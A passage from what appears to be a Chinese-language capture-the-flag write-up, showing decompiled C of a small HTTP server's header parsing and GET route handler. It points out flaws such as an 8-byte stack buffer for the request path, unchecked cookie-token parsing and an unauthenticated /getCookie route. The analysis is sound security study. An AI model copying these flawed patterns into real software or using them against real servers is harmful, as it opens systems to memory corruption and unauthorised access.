class="n">req</span><span class="o">-&gt;</span><span class="n">header_count</span><span class="p">;</span> </span></span><span class="line"><span class="cl"> <span class="p">}</span> </span></span><span class="line"><span class="cl"> <span class="k">if</span> <span class="p">(</span> <span class="o">!</span><span class="nf">strcmp</span><span class="p">(</span><span class="n">haystack</span><span class="p">,</span> <span class="s">&#34;Content-Length&#34;</span><span class="p">)</span> <span class="p">)</span> </span></span><span class="line"><span class="cl"> <span class="n">req</span><span class="o">-&gt;</span><span class="n">content_length</span> <span class="o">=</span> <span class="nf">atoi</span><span class="p">(</span><span class="n">nptr</span><span class="p">);</span> </span></span><span class="line"><span class="cl"> <span class="k">if</span> <span class="p">(</span> <span class="o">!</span><span class="nf">strcmp</span><span class="p">(</span><span class="n">haystack</span><span class="p">,</span> <span class="s">&#34;Cookie&#34;</span><span class="p">)</span> <span class="p">)</span> </span></span><span class="line"><span class="cl"> <span class="p">{</span> </span></span><span class="line"><span class="cl"> <span class="n">s</span> <span class="o">=</span> <span class="nf">strstr</span><span class="p">(</span><span class="n">nptr</span><span class="p">,</span> <span class="s">&#34;token&#34;</span><span class="p">);</span> </span></span><span class="line"><span class="cl"> <span class="k">if</span> <span class="p">(</span> <span class="n">s</span> <span class="p">)</span> </span></span><span class="line"><span class="cl"> <span class="p">{</span> </span></span><span class="line"><span class="cl"> <span class="n">eq</span> <span class="o">=</span> <span class="nf">strchr</span><span class="p">(</span><span class="n">s</span><span class="p">,</span> <span class="sc">&#39;=&#39;</span><span class="p">);</span> </span></span><span class="line"><span class="cl"> <span class="o">*</span><span class="n">eq</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span> </span></span><span class="line"><span class="cl"> <span class="n">tkend</span> <span class="o">=</span> <span class="nf">strchr</span><span class="p">(</span><span class="n">eq</span> <span class="o">+</span> <span class="mi">1</span><span class="p">,</span> <span class="sc">&#39;;&#39;</span><span class="p">);</span> </span></span><span class="line"><span class="cl"> <span class="k">if</span> <span class="p">(</span> <span class="n">tkend</span> <span class="p">)</span> </span></span><span class="line"><span class="cl"> <span class="o">*</span><span class="n">tkend</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span> </span></span><span class="line"><span class="cl"> <span class="nf">strncpy</span><span class="p">(</span><span class="n">req</span><span class="o">-&gt;</span><span class="n">cookie_key</span><span class="p">,</span> <span class="n">s</span><span class="p">,</span> <span class="mh">0x3Fu</span><span class="p">);</span> </span></span><span class="line"><span class="cl"> <span class="nf">strncpy</span><span class="p">(</span><span class="n">req</span><span class="o">-&gt;</span><span class="n">cookie_value</span><span class="p">,</span> <span class="n">eq</span> <span class="o">+</span> <span class="mi">1</span><span class="p">,</span> <span class="mh">0xFFu</span><span class="p">);</span> </span></span><span class="line"><span class="cl"> <span class="p">}</span> </span></span><span class="line"><span class="cl"> <span class="p">}</span> </span></span><span class="line"><span class="cl"> <span class="p">}</span> </span></span><span class="line"><span class="cl"> <span class="p">}</span> </span></span><span class="line"><span class="cl"> <span class="k">if</span> <span class="p">(</span> <span class="o">!</span><span class="nf">strcmp</span><span class="p">(</span><span class="n">req</span><span class="o">-&gt;</span><span class="n">method</span><span class="p">,</span> <span class="s">&#34;POST&#34;</span><span class="p">)</span> <span class="p">)</span> </span></span><span class="line"><span class="cl"> <span class="p">{</span> </span></span><span class="line"><span class="cl"> <span class="n">req</span><span class="o">-&gt;</span><span class="n">post_body</span> <span class="o">=</span> <span class="p">(</span><span class="kt">char</span> <span class="o">*</span><span class="p">)</span><span class="nf">malloc</span><span class="p">(</span><span class="n">req</span><span class="o">-&gt;</span><span class="n">content_length</span> <span class="o">+</span> <span class="mi">3</span><span class="p">);</span> </span></span><span class="line"><span class="cl"> <span class="n">v2</span> <span class="o">=</span> <span class="nf">malloc_usable_size</span><span class="p">(</span><span class="n">req</span><span class="o">-&gt;</span><span class="n">post_body</span><span class="p">);</span> </span></span><span class="line"><span class="cl"> <span class="nf">memset</span><span class="p">(</span><span class="n">req</span><span class="o">-&gt;</span><span class="n">post_body</span><span class="p">,</span> <span class="mi">0</span><span class="p">,</span> <span class="n">v2</span><span class="p">);</span> </span></span><span class="line"><span class="cl"> <span class="nf">memcpy</span><span class="p">(</span><span class="n">req</span><span class="o">-&gt;</span><span class="n">post_body</span><span class="p">,</span> <span class="n">end</span> <span class="o">+</span> <span class="mi">4</span><span class="p">,</span> <span class="n">req</span><span class="o">-&gt;</span><span class="n">content_length</span><span class="p">);</span> </span></span><span class="line"><span class="cl"> <span class="nf">memcpy</span><span class="p">(</span><span class="o">&amp;</span><span class="n">req</span><span class="o">-&gt;</span><span class="n">post_body</span><span class="p">[</span><span class="n">req</span><span class="o">-&gt;</span><span class="n">content_length</span><span class="p">],</span> <span class="s">&#34;</span><span class="se">\r\n</span><span class="s">&#34;</span><span class="p">,</span> <span class="mi">2u</span><span class="p">);</span> </span></span><span class="line"><span class="cl"> <span class="p">}</span> </span></span><span class="line"><span class="cl"> <span class="k">return</span> <span class="n">v14</span> <span class="o">-</span> <span class="nf">__readfsqword</span><span class="p">(</span><span class="mh">0x28u</span><span class="p">);</span> </span></span><span class="line"><span class="cl"><span class="p">}</span> </span></span></code></pre></td></tr></table> </div> </div><p>正常的解析请求</p> <p>请求头会解析 Cookie 的 token 字段</p> <h4 id="handle_get">handle_get </h4><div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt"> 10 </span><span class="lnt"> 11 </span><span class="lnt"> 12 </span><span class="lnt"> 13 </span><span class="lnt"> 14 </span><span class="lnt"> 15 </span><span class="lnt"> 16 </span><span class="lnt"> 17 </span><span class="lnt"> 18 </span><span class="lnt"> 19 </span><span class="lnt"> 20 </span><span class="lnt"> 21 </span><span class="lnt"> 22 </span><span class="lnt"> 23 </span><span class="lnt"> 24 </span><span class="lnt"> 25 </span><span class="lnt"> 26 </span><span class="lnt"> 27 </span><span class="lnt"> 28 </span><span class="lnt"> 29 </span><span class="lnt"> 30 </span><span class="lnt"> 31 </span><span class="lnt"> 32 </span><span class="lnt"> 33 </span><span class="lnt"> 34 </span><span class="lnt"> 35 </span><span class="lnt"> 36 </span><span class="lnt"> 37 </span><span class="lnt"> 38 </span><span class="lnt"> 39 </span><span class="lnt"> 40 </span><span class="lnt"> 41 </span><span class="lnt"> 42 </span><span class="lnt"> 43 </span><span class="lnt"> 44 </span><span class="lnt"> 45 </span><span class="lnt"> 46 </span><span class="lnt"> 47 </span><span class="lnt"> 48 </span><span class="lnt"> 49 </span><span class="lnt"> 50 </span><span class="lnt"> 51 </span><span class="lnt"> 52 </span><span class="lnt"> 53 </span><span class="lnt"> 54 </span><span class="lnt"> 55 </span><span class="lnt"> 56 </span><span class="lnt"> 57 </span><span class="lnt"> 58 </span><span class="lnt"> 59 </span><span class="lnt"> 60 </span><span class="lnt"> 61 </span><span class="lnt"> 62 </span><span class="lnt"> 63 </span><span class="lnt"> 64 </span><span class="lnt"> 65 </span><span class="lnt"> 66 </span><span class="lnt"> 67 </span><span class="lnt"> 68 </span><span class="lnt"> 69 </span><span class="lnt"> 70 </span><span class="lnt"> 71 </span><span class="lnt"> 72 </span><span class="lnt"> 73 </span><span class="lnt"> 74 </span><span class="lnt"> 75 </span><span class="lnt"> 76 </span><span class="lnt"> 77 </span><span class="lnt"> 78 </span><span class="lnt"> 79 </span><span class="lnt"> 80 </span><span class="lnt"> 81 </span><span class="lnt"> 82 </span><span class="lnt"> 83 </span><span class="lnt"> 84 </span><span class="lnt"> 85 </span><span class="lnt"> 86 </span><span class="lnt"> 87 </span><span class="lnt"> 88 </span><span class="lnt"> 89 </span><span class="lnt"> 90 </span><span class="lnt"> 91 </span><span class="lnt"> 92 </span><span class="lnt"> 93 </span><span class="lnt"> 94 </span><span class="lnt"> 95 </span><span class="lnt"> 96 </span><span class="lnt"> 97 </span><span class="lnt"> 98 </span><span class="lnt"> 99 </span><span class="lnt">100 </span><span class="lnt">101 </span><span class="lnt">102 </span><span class="lnt">103 </span><span class="lnt">104 </span><span class="lnt">105 </span><span class="lnt">106 </span><span class="lnt">107 </span><span class="lnt">108 </span><span class="lnt">109 </span><span class="lnt">110 </span><span class="lnt">111 </span><span class="lnt">112 </span><span class="lnt">113 </span><span class="lnt">114 </span><span class="lnt">115 </span><span class="lnt">116 </span><span class="lnt">117 </span><span class="lnt">118 </span><span class="lnt">119 </span><span class="lnt">120 </span><span class="lnt">121 </span><span class="lnt">122 </span><span class="lnt">123 </span><span class="lnt">124 </span><span class="lnt">125 </span><span class="lnt">126 </span><span class="lnt">127 </span><span class="lnt">128 </span><span class="lnt">129 </span><span class="lnt">130 </span><span class="lnt">131 </span><span class="lnt">132 </span><span class="lnt">133 </span><span class="lnt">134 </span><span class="lnt">135 </span><span class="lnt">136 </span><span class="lnt">137 </span><span class="lnt">138 </span><span class="lnt">139 </span><span class="lnt">140 </span><span class="lnt">141 </span><span class="lnt">142 </span><span class="lnt">143 </span><span class="lnt">144 </span><span class="lnt">145 </span><span class="lnt">146 </span><span class="lnt">147 </span><span class="lnt">148 </span><span class="lnt">149 </span><span class="lnt">150 </span><span class="lnt">151 </span><span class="lnt">152 </span><span class="lnt">153 </span><span class="lnt">154 </span><span class="lnt">155 </span><span class="lnt">156 </span><span class="lnt">157 </span><span class="lnt">158 </span><span class="lnt">159 </span><span class="lnt">160 </span><span class="lnt">161 </span><span class="lnt">162 </span><span class="lnt">163 </span><span class="lnt">164 </span><span class="lnt">165 </span><span class="lnt">166 </span><span class="lnt">167 </span><span class="lnt">168 </span><span class="lnt">169 </span><span class="lnt">170 </span><span class="lnt">171 </span><span class="lnt">172 </span><span class="lnt">173 </span><span class="lnt">174 </span><span class="lnt">175 </span><span class="lnt">176 </span><span class="lnt">177 </span><span class="lnt">178 </span><span class="lnt">179 </span><span class="lnt">180 </span><span class="lnt">181 </span><span class="lnt">182 </span><span class="lnt">183 </span><span class="lnt">184 </span><span class="lnt">185 </span><span class="lnt">186 </span><span class="lnt">187 </span><span class="lnt">188 </span><span class="lnt">189 </span><span class="lnt">190 </span><span class="lnt">191 </span><span class="lnt">192 </span><span class="lnt">193 </span><span class="lnt">194 </span><span class="lnt">195 </span><span class="lnt">196 </span><span class="lnt">197 </span><span class="lnt">198 </span><span class="lnt">199 </span><span class="lnt">200 </span><span class="lnt">201 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-c" data-lang="c"><span class="line"><span class="cl"><span class="c1">// GET route handler. Uses an 8-byte stack buffer for the normalized path, serves a few fixed pages, and exposes an unauthenticated /getCookie route. </span></span></span><span class="line"><span class="cl"><span class="kt">unsigned</span> <span class="kr">__int64</span> <span class="kr">__fastcall</span> <span class="nf">handle_get</span><span class="p">(</span><span class="kt">unsigned</span> <span class="kt">int</span> <span class="n">fd</span><span class="p">,</span> <span class="kt">request_t</span> <span class="o">*</span><span class="n">req</span><span class="p">)</span> </span></span><span class="line"><span class="cl"><span class="p">{</span> </span></span><span class="line"><span class="cl"> <span class="kt">int</span> <span class="n">v2</span><span class="p">;</span> <span class="c1">// eax </span></span></span><span class="line"><span class="cl"> <span class="kt">int</span> <span class="n">v3</span><span class="p">;</span> <span class="c1">// eax </span></span></span><span class="line"><span class="cl"> <span class="kt">int</span> <span class="n">v4</span><span class="p">;</span> <span class="c1">// eax </span></span></span><span class="line"><span class="cl"> <span class="kt">int</span> <span class="n">v5</span><span class="p">;</span> <span class="c1">// eax </span></span></span><span class="line"><span class="cl"> <span class="kt">char</span> <span class="n">s1</span><span class="p">[</span><span class="mi">8</span><span class="p">];</span> <span class="c1">// [rsp+10h] [rbp-210h] BYREF </span></span></span><span class="line"><span class="cl"> <span class="kr">__int64</span> <span class="n">v8</span><span class="p">;</span> <span class="c1">// [rsp+18h] [rbp-208h] </span></span></span><span class="line"><span class="cl"> <span class="kr">__int64</span> <span class="n">v9</span><span class="p">;</span> <span class="c1">// [rsp+20h] [rbp-200h] </span></span></span><span class="line"><span class="cl"> <span class="kr">__int64</span> <span class="n">v10</span><span class="p">;</span> <span class="c1">// [rsp+28h] [rbp-1F8h] </span></span></span><span class="line"><span class="cl"> <span class="kr">__int64</span> <span class="n">v11</span><span class="p">;</span> <span class="c1">// [rsp+30h] [rbp-1F0h] </span></span></span><span class="line"><span class="cl"> <span class="kr">__int64</span> <span class="n">v12</span><span class="p">;</span> <span class="c1">// [rsp+38h] [rbp-1E8h] </span></span></span><span class="line"><span class="cl"> <span class="kr">__int64</span> <span class="n">v13</span><span class="p">;</span> <span class="c1">// [rsp+40h] [rbp-1E0h] </span></span></span><span class="line"><span class="cl"> <span class="kr">__int64</span> <span class="n">v14</span><span class="p">;</span> <span class="c1">// [rsp+48h] [rbp-1D8h] </span></span></span><span class="line"><span class="cl"> <span class="kr">__int64</span> <span class="n">v15</span><span class="p">;</span> <span class="c1">// [rsp+50h] [rbp-1D0h] </span></span></span><span class="line"><span class="cl"> <span class="kr">__int64</span> <span class="n">v16</span><span class="p">;</span> <span class="c1">// [rsp+58h] [rbp-1C8h] </span></span></span><span class="line"><span class="cl"> <span class="kr">__int64</span> <span class="n">v17</span><span class="p">;</span> <span class="c1">// [rsp+60h] [rbp-1C0h] </span></span></span><span class="line"><span class="cl"> <span class="kr">__int64</span> <span class="n">v18</span><span class="p">;</span> <span class="c1">// [rsp+68h] [rbp-1B8h] </span></span></span><span class="line"><span class="cl"> <span class="kr">__int64</span> <span class="n">v19</span><span class="p">;</span> <span class="c1">// [rsp+70h] [rbp-1B0h] </span></span></span><span class="line"><span class="cl"> <span class="kr">__int64</span> <span class="n">v20</span><span class="p">;</span> <span class="c1">// [rsp+78h] [rbp-1A8h] </span></span></span><span class="line"><span class="cl"> <span class="kr">__int64</span> <span class="n">v21</span><span class="p">;</span> <span class="c1">// [rsp+80h] [rbp-1A0h] </span></span></span><span class="line"><span class="cl"> <span class="kr">__int64</span> <span class="n">v22</span><span class="p">;</span> <span class="c1">// [rsp+88h] [rbp-198h] </span></span></span><span class="line"><span class="cl"> <span class="kr">__int64</span> <span class="n">v23</span><span class="p">;</span> <span class="c1">// [rsp+90h] [rbp-190h] </span></span></span><span class="line"><span class="cl"> <span class="kr">__int64</span> <span class="n">v24</span><span class="p">;</span> <span class="c1">// [rsp+98h] [rbp-188h] </span></span></span><span class="line"><span class="cl"> <span class="kr">__int64</span> <span class="n">v25</span><span class="p">;</span> <span class="c1">// [rsp+A0h] [rbp-180h] </span></span></span><span class="line"><span class="cl"> <span class="kr">__int64</span> <span class="n">v26</span><span class="p">;</span> <span class="c1">// [rsp+A8h] [rbp-178h] </span></span></span><span class="line"><span class="cl"> <span class="kr">__int64</span> <span class="n">v27</span><span class="p">;</span> <span class="c1">// [rsp+B0h] [rbp-170h] </span></span></span><span class="line"><span class="cl"> <span class="kr">__int64</span> <span class="n">v28</span><span class="p">;</span> <span class="c1">// [rsp+B8h] [rbp-168h] </span></span></span><span class="line"><span class="cl"> <span class="kr">__int64</span> <span class="n">v29</span><span class="p">;</span> <span class="c1">// [rsp+C0h] [rbp-160h] </span></span></span><span class="line"><span class="cl"> <span class="kr">__int64</span> <span class="n">v30</span><span class="p">;</span> <span class="c1">// [rsp+C8h] [rbp-158h] </span></span></span><span class="line"><span class="cl"> <span class="kr">__int64</span> <span class="n">v31</span><span class="p">;</span> <span class="c1">// [rsp+D0h] [rbp-150h] </span></span></span><span class="line"><span class="cl"> <span class="kr">__int64</span> <span class="n">v32</span><span class="p">;</span> <span class="c1">// [rsp+D8h] [rbp-148h] </span></span></span><span class="line"><span class="cl"> <span class="kr">__int64</span> <span class="n">v33</span><span class="p">;</span> <span class="c1">// [rsp+E0h] [rbp-140h] </span></span></span><span class="line"><span class="cl"> <span class="kr">__int64</span> <span class="n">v34</span><span class="p">;</span> <span class="c1">// [rsp+E8h] [rbp-138h] </span></span></span><span class="line"><span class="cl"> <span class="kr">__int64</span> <span class="n">v35</span><span class="p">;</span> <span class="c1">// [rsp+F0h] [rbp-130h] </span></span></span><span class="line"><span class="cl"> <span class="kr">__int64</span> <span class="n">v36</span><span class="p">;</span> <span class="c1">// [rsp+F8h] [rbp-128h] </span></span></span><span class="line"><span class="cl"> <span class="kr">__int64</span> <span class="n">v37</span><span class="p">;</span> <span class="c1">// [rsp+100h] [rbp-120h] </span></span></span><span class="line"><span class="cl"> <span class="kr">__int64</span> <span class="n">v38</span><span class="p">;</span> <span class="c1">// [rsp+108h] [rbp-118h] </span></span></span><span class="line"><span class="cl"> <span class="kt">char</span> <span class="n">s</span><span class="p">[</span><span class="mi">8</span><span class="p">];</span> <span class="c1">// [rsp+110h] [rbp-110h] BYREF </span></span></span><span class="line"><span class="cl"> <span class="kr">__int64</span> <span class="n">v40</span><span class="p">;</span> <span class="c1">// [rsp+118h] [rbp-108h] </span></span></span><span class="line"><span class="cl"> <span class="kr">__int64</span> <span class="n">v41</span><span class="p">;</span> <span class="c1">// [rsp+120h] [rbp-100h] </span></span></span><span class="line"><span class="cl"> <span class="kr">__int64</span> <span class="n">v42</span><span class="p">;</span> <span class="c1">// [rsp+128h] [rbp-F8h] </span></span></span><span class="line"><span class="cl"> <span class="kr">__int64</span> <span class="n">v43</span><span class="p">;</span> <span class="c1">// [rsp+130h] [rbp-F0h] </span></span></span><span class="line"><span class="cl"> <span class="kr">__int64</span> <span class="n">v44</span><span class="p">;</span> <span class="c1">// [rsp+138h] [rbp-E8h] </span></span></span><span class="line"><span class="cl"> <span class="kr">__int64</span> <span class="n">v45</span><span class="p">;</span> <span class="c1">// [rsp+140h] [rbp-E0h] </span></span></span><span class="line"><span class="cl"> <span class="kr">__int64</span> <span class="n">v46</span><span class="p">;</span> <span class="c1">// [rsp+148h] [rbp-D8h] </span></span></span><span class="line"><span class="cl"> <span class="kr">__int64</span> <span class="n">v47</span><span class="p">;</span> <span class="c1">// [rsp+150h] [rbp-D0h] </span></span></span><span class="line"><span class="cl"> <span class="kr">__int64</span> <span class="n">v48</span><span class="p">;</span> <span class="c1">// [rsp+158h] [rbp-C8h] </span></span></span><span class="line"><span class="cl"> <span class="kr">__int64</span> <span class="n">v49</span><span class="p">;</span> <span class="c1">// [rsp+160h] [rbp-C0h] </span></span></span><span class="line"><span class="cl"> <span class="kr">__int64</span> <span class="n">v50</span><span class="p">;</span> <span class="c1">// [rsp+168h] [rbp-B8h] </span></span></span><span class="line"><span class="cl"> <span class="kr">__int64</span> <span class="n">v51</span><span class="p">;</span> <span class="c1">// [rsp+170h] [rbp-B0h] </span></span></span><span class="line"><span class="cl"> <span class="kr">__int64</span> <span class="n">v52</span><span class="p">;</span> <span class="c1">// [rsp+178h] [rbp-A8h] </span></span></span><span class="line"><span class="cl"> <span class="kr">__int64</span> <span class="n">v53</span><span class="p">;</span> <span class="c1">// [rsp+180h] [rbp-A0h] </span></span></span><span class="line"><span class="cl"> <span class="kr">__int64</span> <span class="n">v54</span><span class="p">;</span> <span class="c1">// [rsp+188h] [rbp-98h] </span></span></span><span class="line"><span class="cl"> <span class="kr">__int64</span> <span class="n">v55</span><span class="p">;</span> <span class="c1">// [rsp+190h] [rbp-90h] </span></span></span><span class="line"><span class="cl"> <span class="kr">__int64</span> <span class="n">v56</span><span class="p">;</span> <span class="c1">// [rsp+198h] [rbp-88h] </span></span></span><span class="line"><span class="cl"> <span class="kr">__int64</span> <span class="n">v57</span><span class="p">;</span> <span class="c1">// [rsp+1A0h] [rbp-80h] </span></span></span><span class="line"><span class="cl"> <span class="kr">__int64</span> <span class="n">v58</span><span class="p">;</span> <span class="c1">// [rsp+1A8h] [rbp-78h] </span></span></span><span class="line"><span class="cl"> <span class="kr">__int64</span> <span class="n">v59</span><span class="p">;</span> <span class="c1">// [rsp+1B0h] [rbp-70h] </span></span></span><span class="line"><span class="cl"> <span class="kr">__int64</span> <span class="n">v60</span><span class="p">;</span> <span class="c1">// [rsp+1B8h] [rbp-68h] </span></span></span><span class="line"><span class="cl"> <span class="kr">__int64</span> <span class="n">v61</span><span class="p">;</span> <span class="c1">// [rsp+1C0h] [rbp-60h] </span></span></span><span class="line"><span class="cl"> <span class="kr">__int64</span> <span class="n">v62</span><span class="p">;</span> <span class="c1">// [rsp+1C8h] [rbp-58h] </span></span></span><span class="line"><span class="cl"> <span class="kr">__int64</span> <span class="n">v63</span><span class="p">;</span> <span class="c1">// [rsp+1D0h] [rbp-50h] </span></span></span><span class="line"><span class="cl"> <span class="kr">__int64</span> <span class="n">v64</span><span class="p">;</span> <span class="c1">// [rsp+1D8h] [rbp-48h] </span></span></span><span class="line"><span class="cl"> <span class="kr">__int64</span> <span class="n">v65</span><span class="p">;</span> <span class="c1">// [rsp+1E0h] [rbp-40h] </span></span></span><span class="line"><span class="cl"> <span class="kr">__int64</span> <span class="n">v66</span><span class="p">;</span> <span class="c1">// [rsp+1E8h] [rbp-38h] </span></span></span><span class="line"><span class="cl"> <span class="kr">__int64</span> <span class="n">v67</span><span class="p">;</span> <span class="c1">// [rsp+1F0h] [rbp-30h] </span></span></span><span class="line"><span class="cl"> <span class="kr">__int64</span> <span class="n">v68</span><span class="p">;</span> <span class="c1">// [rsp+1F8h] [rbp-28h] </span></span></span><span class="line"><span class="cl"> <span class="kr">__int64</span> <span class="n">v69</span><span class="p">;</span> <span class="c1">// [rsp+200h] [rbp-20h] </span></span></span><span class="line"><span class="cl"> <span class="kr">__int64</span> <span class="n">v70</span><span class="p">;</span> <span class="c1">// [rsp+208h] [rbp-18h] </span></span></span><span class="line"><span class="cl"> <span class="kt">unsigned</span> <span class="kr">__int64</span> <span class="n">v71</span><span class="p">;</span> <span class="c1">// [rsp+218h] [rbp-8h] </span></span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"> <span class="n">v71</span> <span class="o">=</span> <span class="nf">__readfsqword</span><span class="p">(</span><span class="mh">0x28u</span><span class="p">);</span> </span></span><span class="line"><span class="cl"> <span class="o">*</span><span class="p">(</span><span class="n">_QWORD</span> <span class="o">*</span><span class="p">)</span><span class="n">s1</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span> </span></span><span class="line"><span class="cl"> <span class="n">v8</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span> </span></span><span class="line"><span class="cl"> <span class="n">v9</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span> </span></span><span class="line"><span class="cl"> <span class="n">v10</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span> </span></span><span class="line"><span class="cl"> <span class="n">v11</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span> </span></span><span class="line"><span class="cl"> <span class="n">v12</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span> </span></span><span class="line"><span class="cl"> <span class="n">v13</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span> </span></span><span class="line"><span class="cl"> <span class="n">v14</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span> </span></span><span class="line"><span class="cl"> <span class="n">v15</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span> </span></span><span class="line"><span class="cl"> <span class="n">v16</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span> </span></span><span class="line"><span class="cl"> <span class="n">v17</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span> </span></span><span class="line"><span class="cl"> <span class="n">v18</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span> </span></span><span class="line"><span class="cl"> <span class="n">v19</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span> </span></span><span class="line"><span class="cl"> <span class="n">v20</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span> </span></span><span class="line"><span class="cl"> <span class="n">v21</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span> </span></span><span class="line"><span class="cl"> <span class="n">v22</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span> </span></span><span class="line"><span class="cl"> <span class="n">v23</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span> </span></span><span class="line"><span class="cl"> <span class="n">v24</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span> </span></span><span class="line"><span class="cl"> <span class="n">v25</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span> </span></span><span class="line"><span class="cl"> <span class="n">v26</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span> </span></span><span class="line"><span class="cl"> <span class="n">v27</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span> </span></span><span class="line"><span class="cl"> <span class="n">v28</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span> </span></span><span class="line"><span class="cl"> <span class="n">v29</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span> </span></span><span class="line"><span class="cl"> <span class="n">v30</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span> </span></span><span class="line"><span class="cl"> <span class="n">v31</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span> </span></span><span class="line"><span class="cl"> <span class="n">v32</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span> </span></span><span class="line"><span class="cl"> <span class="n">v33</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span> </span></span><span class="line"><span class="cl"> <span class="n">v34</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span> </span></span><span class="line"><span class="cl"> <span class="n">v35</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span> </span></span><span class="line"><span class="cl"> <span class="n">v36</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span> </span></span><span class="line"><span class="cl"> <span class="n">v37</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span> </span></span><span class="line"><span class="cl"> <span class="n">v38</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span> </span></span><span class="line"><span class="cl"> <span class="nf">extract_path_no_query</span><span class="p">(</span><span class="n">req</span><span class="o">-&gt;</span><span class="n">path</span><span class="p">,</span> <span class="n">s1</span><span class="p">);</span> </span></span><span class="line"><span class="cl"> <span class="k">if</span> <span class="p">(</span> <span class="o">!</span><span class="nf">strcmp</span><span class="p">(</span><span class="n">s1</span><span class="p">,</span> <span class="s">&#34;/index&#34;</span><span class="p">)</span> <span class="o">||</span> <span class="o">!</span><span class="nf">strcmp</span><span class="p">(</span><span class="n">s1</span><span class="p">,</span> <span class="s">&#34;/&#34;</span><span class="p">)</span> <span class="p">)</span> </span></span><span class="line"><span class="cl"> <span class="p">{</span> </span></span><span class="line"><span class="cl"> <span class="nf">LOBYTE</span><span class="p">(</span><span class="n">v2</span><span class="p">)</span> <span class="o">=</span> <span class="nf">judge_token</span><span class="p">(</span><span class="n">req</span><span class="p">);</span> </span></span><span class="line"><span class="cl"> <span class="k">if</span> <span class="p">(</span> <span class="n">v2</span> <span class="p">)</span> </span></span><span class="line"><span class="cl"> <span class="p">{</span> </span></span><span class="line"><span class="cl"> <span class="nf">serve_static_page</span><span class="p">(</span><span class="n">fd</span><span class="p">,</span> <span class="s">&#34;index.html&#34;</span><span class="p">,</span> <span class="mi">200u</span><span class="p">);</span> </span></span><span class="line"><span class="cl"> <span class="k">return</span> <span class="n">v71</span> <span class="o">-</span> <span class="nf">__readfsqword</span><span class="p">(</span><span class="mh">0x28u</span><span class="p">);</span> </span></span><span class="line"><span class="cl"> <span class="p">}</span> </span></span><span class="line"><span class="cl"><span class="nl">LABEL_19</span><span class="p">:</span> </span></span><span class="line"><span class="cl"> <span class="nf">send_redirect</span><span class="p">(</span><span class="n">fd</span><span class="p">,</span> <span class="s">&#34;/login&#34;</span><span class="p">,</span> <span class="mi">0</span><span class="p">);</span> </span></span><span class="line"><span class="cl"> <span class="k">return</span> <span class="n">v71</span> <span class="o">-</span> <span class="nf">__readfsqword</span><span class="p">(</span><span class="mh">0x28u</span><span class="p">);</span> </span></span><span class="line"><span class="cl"> <span class="p">}</span> </span></span><span class="line"><span class="cl"> <span class="k">if</span> <span class="p">(</span> <span class="o">!</span><span class="nf">strcmp</span><span class="p">(</span><span class="n">s1</span><span class="p">,</span> <span class="s">&#34;/login&#34;</span><span class="p">)</span> <span class="p">)</span> </span></span><span class="line"><span class="cl"> <span class="p">{</span> </span></span><span class="line"><span class="cl"> <span class="nf">LOBYTE</span><span class="p">(</span><span class="n">v3</span><span class="p">)</span> <span class="o">=</span> <span class="nf">judge_token</span><span class="p">(</span><span class="n">req</span><span class="p">);</span> </span></span><span class="line"><span class="cl"> <span class="k">if</span> <span class="p">(</span> <span class="n">v3</span> <span class="p">)</span> </span></span><span class="line"><span class="cl"> <span class="nf">send_redirect</span><span class="p">(</span><span class="n">fd</span><span class="p">,</span> <span class="s">&#34;/index&#34;</span><span class="p">,</span> <span class="mi">0</span><span class="p">);</span> </span></span><span class="line"><span class="cl"> <span class="k">else</span> </span></span><span class="line"><span class="cl"> <span class="nf">serve_static_page</span><span class="p">(</span><span class="n">fd</span><span class="p">,</span> <span class="s">&#34;login.html&#34;</span><span class="p">,</span> <span class="mh">0xC8u</span><span class="p">);</span> </span></span><span class="line"><span class="cl"> <span class="p">}</span> </span></span><span class="line"><span class="cl"> <span class="k">else</span> </span></span><span class="line"><span class="cl"> <span class="p">{</span> </span></span><span class="line"><span class="cl"> <span class="k">if</span> <span class="p">(</span> <span class="o">!</span><span class="nf">strcmp</span><span class="p">(</span><span class="n">s1</span><span class="p">,</span> <span class="s">&#34;/logout&#34;</span><span class="p">)</span> <span class="p">)</span> </span></span><span class="line"><span class="cl"> <span class="p">{</span> </span></span><span class="line"><span class="cl"> <span class="o">*</span><span class="p">(</span><span class="n">_QWORD</span> 